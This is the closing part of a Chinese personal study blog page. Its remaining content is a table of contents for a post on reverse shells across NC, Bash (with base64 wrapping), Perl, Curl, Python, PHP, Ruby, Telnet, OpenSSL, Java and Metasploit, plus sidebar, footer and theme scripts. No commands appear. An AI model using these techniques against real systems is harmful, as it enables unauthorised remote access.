class="toc-item toc-level-4"><a class="toc-link" href="#NC%E5%8F%8D%E5%90%91Shell"><span class="toc-number">4.1.2.</span> <span class="toc-text">NC反向Shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%97%A0-e-%E5%8F%82%E6%95%B0%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">4.1.3.</span> <span class="toc-text">无 -e 参数反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">4.1.3.1.</span> <span class="toc-text">方法一</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-number">4.1.3.2.</span> <span class="toc-text">方法二</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf"><span class="toc-number">4.1.4.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bash%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">4.2.</span> <span class="toc-text">Bash反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A"><span class="toc-number">4.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A"><span class="toc-number">4.2.2.</span> <span class="toc-text">方法二：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E7%9B%B4%E6%8E%A5%E6%89%A7%E8%A1%8C%E5%8F%8D%E5%BC%B9shell%E5%91%A2%EF%BC%9F%E8%80%8C%E6%98%AFbase64%E5%8A%A0%E5%AF%86%E5%86%8D%E8%A7%A3%E5%AF%86%EF%BC%81"><span class="toc-number">4.2.2.1.</span> <span class="toc-text">为什么不直接执行反弹shell呢？而是base64加密再解密！</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf-1"><span class="toc-number">4.2.3.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Perl"><span class="toc-number">4.3.</span> <span class="toc-text">Perl</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E7%AB%AF"><span class="toc-number">4.3.1.</span> <span class="toc-text">控制端</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A2%AB%E6%8E%A7%E7%AB%AF"><span class="toc-number">4.3.2.</span> <span class="toc-text">被控端</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf-2"><span class="toc-number">4.3.3.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Curl"><span class="toc-number">4.4.</span> <span class="toc-text">Curl</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#vps"><span class="toc-number">4.4.1.</span> <span class="toc-text">vps</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#target"><span class="toc-number">4.4.2.</span> <span class="toc-text">target</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#result"><span class="toc-number">4.4.3.</span> <span class="toc-text">result</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Python"><span class="toc-number">4.5.</span> <span class="toc-text">Python</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Python%E4%B8%80%E8%A1%8C%E5%91%BD%E4%BB%A4%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">4.5.1.</span> <span class="toc-text">Python一行命令反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A2%AB%E6%8E%A7%E7%AB%AF-1"><span class="toc-number">4.5.1.1.</span> <span class="toc-text">被控端</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E7%AB%AF-1"><span class="toc-number">4.5.1.2.</span> <span class="toc-text">控制端</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87Msfvenom%E7%94%9F%E6%88%90python%E5%8F%8D%E5%BC%B9shell%E7%9A%84payload"><span class="toc-number">4.5.2.</span> <span class="toc-text">通过Msfvenom生成python反弹shell的payload</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87Web-delivery%E5%8F%8D%E5%BC%B9shell%EF%BC%9A"><span class="toc-number">4.5.3.</span> <span class="toc-text">通过Web delivery反弹shell：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf-3"><span class="toc-number">4.5.4.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP"><span class="toc-number">4.6.</span> <span class="toc-text">PHP</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#PHP%E4%B8%80%E8%A1%8C%E5%91%BD%E4%BB%A4%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">4.6.1.</span> <span class="toc-text">PHP一行命令反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Msfvenom%E7%94%9F%E6%88%90php%E5%8F%8D%E5%BC%B9shell%E8%84%9A%E6%9C%AC"><span class="toc-number">4.6.2.</span> <span class="toc-text">Msfvenom生成php反弹shell脚本</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87web-delivery%E5%8F%8D%E5%BC%B9shell%EF%BC%9A"><span class="toc-number">4.6.3.</span> <span class="toc-text">通过web_delivery反弹shell：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf-4"><span class="toc-number">4.6.4.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Ruby"><span class="toc-number">4.7.</span> <span class="toc-text">Ruby</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#msf-5"><span class="toc-number">4.7.1.</span> <span class="toc-text">msf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Telnet"><span class="toc-number">4.8.</span> <span class="toc-text">Telnet</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#OpenSSL"><span class="toc-number">4.9.</span> <span class="toc-text">OpenSSL</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Java%E5%8F%8D%E5%BC%B9shell%E5%B8%B8%E7%94%A8"><span class="toc-number">4.10.</span> <span class="toc-text">Java反弹shell常用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#refer"><span class="toc-number">5.</span> <span class="toc-text">refer</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/48031/" title="JavaScript基础知识"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208211308757.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="JavaScript基础知识"/></a><div class="content"><a class="title" href="/posts/48031/" title="JavaScript基础知识">JavaScript基础知识</a><time datetime="2022-12-27T17:11:27.294Z" title="更新于 2022-12-28 01:11:27">2022-12-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/45992/" title="jQuery基础学习"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237533.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="jQuery基础学习"/></a><div class="content"><a class="title" href="/posts/45992/" title="jQuery基础学习">jQuery基础学习</a><time datetime="2022-12-27T10:54:26.065Z" title="更新于 2022-12-27 18:54:26">2022-12-27</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/4710/" title="12. 网络编程"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208211308745.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="12. 网络编程"/></a><div class="content"><a class="title" href="/posts/4710/" title="12. 网络编程">12. 网络编程</a><time datetime="2022-12-27T09:19:51.804Z" title="更新于 2022-12-27 17:19:51">2022-12-27</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/5964/" title="11. 异常与文件操作"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237522.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="11. 异常与文件操作"/></a><div class="content"><a class="title" href="/posts/5964/" title="11. 异常与文件操作">11. 异常与文件操作</a><time datetime="2022-12-26T17:08:11.261Z" title="更新于 2022-12-27 01:08:11">2022-12-27</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/38591/" title="10. 元类编程"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237574.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="10. 元类编程"/></a><div class="content"><a class="title" href="/posts/38591/" title="10. 元类编程">10. 元类编程</a><time datetime="2022-12-26T10:50:34.343Z" title="更新于 2022-12-26 18:50:34">2022-12-26</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2022 By 晚上十一点睡觉</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener external nofollow noreferrer" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Welcome to 11pmsleep's blog ~~~ 该网站用来记录学习笔记及生活，欢迎交流技术~~~Blog仅供个人记录笔记学习所用，若有侵权，联系我删除~若有错误，也望诸君不吝指正</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="chat_btn" type="button" title="聊天"><i class="fas fa-sms"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script>function panguFn () {
  if (typeof pangu === 'object') pangu.autoSpacingPage()
  else {
    getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js')
      .then(() => {
        pangu.autoSpacingPage()
      })
  }
}

function panguInit () {
  if (true){
    GLOBAL_CONFIG_SITE.isPost && panguFn()
  } else {
    panguFn()
  }
}

document.addEventListener('DOMContentLoaded', panguInit)</script><script src="/js/search/local-search.js"></script><div class="js-pjax"><script>(()=>{
  const init = () => {
    twikoo.init(Object.assign({
      el: '#twikoo-wrap',
      envId: 'https://twikoo.gungnir.top/',
      region: '',
      onCommentLoaded: function () {
        btf.loadLightbox(document.querySelectorAll('#twikoo .tk-content img:not(.tk-owo-emotion)'))
      }
    }, null))
  }

  const getCount = () => {
    const countELement = document.getElementById('twikoo-count')
    if(!countELement) return
    twikoo.getCommentsCount({
      envId: 'https://twikoo.gungnir.top/',
      region: '',
      urls: [window.location.pathname],
      includeReply: false
    }).then(function (res) {
      countELement.innerText = res[0].count
    }).catch(function (err) {
      console.error(err);
    });
  }

  const runFn = () => {
    init()
    GLOBAL_CONFIG_SITE.isPost && getCount()
  }

  const loadTwikoo = () => {
    if (typeof twikoo === 'object') {
      setTimeout(runFn,0)
      return
    } 
    getScript('https://cdn.jsdelivr.net/npm/twikoo/dist/twikoo.all.min.js').then(runFn)
  }

  if ('Twikoo' === 'Twikoo' || !false) {
    if (false) btf.loadComment(document.getElementById('twikoo-wrap'), loadTwikoo)
    else loadTwikoo()
  } else {
    window.loadOtherComment = () => {
      loadTwikoo()
    }
  }
})()</script></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>